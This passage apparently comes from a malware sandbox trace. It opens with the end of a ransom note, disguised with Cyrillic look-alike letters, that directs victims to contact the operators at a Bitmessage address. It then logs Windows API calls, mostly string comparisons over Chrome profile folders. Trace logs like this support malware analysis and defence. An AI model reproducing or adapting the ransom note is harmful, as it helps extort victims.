bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nNFd5SUkifSx7ImNhbm9uaWN£\x0e", lpUsedDefaultChar=0x0) returned 8717 [0282.654] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ef4b68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4b68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0282.655] CloseHandle (hObject=0x2cc) returned 1 [0282.655] Sleep (dwMilliseconds=0x3e8) [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount2=138) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount2=130) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount2=130) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount2=130) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount2=132) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount2=132) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount2=130) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount2=130) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount2=130) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount2=130) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount2=130) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount2=130) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount2=130) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount2=128) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount2=128) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount2=128) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount2=134) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount2=134) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount2=134) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount2=134) returned 1 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount2=131) returned 3 [0283.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount2=131) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount2=131) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount2=131) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount2=132) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount2=132) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount2=132) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount2=132) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 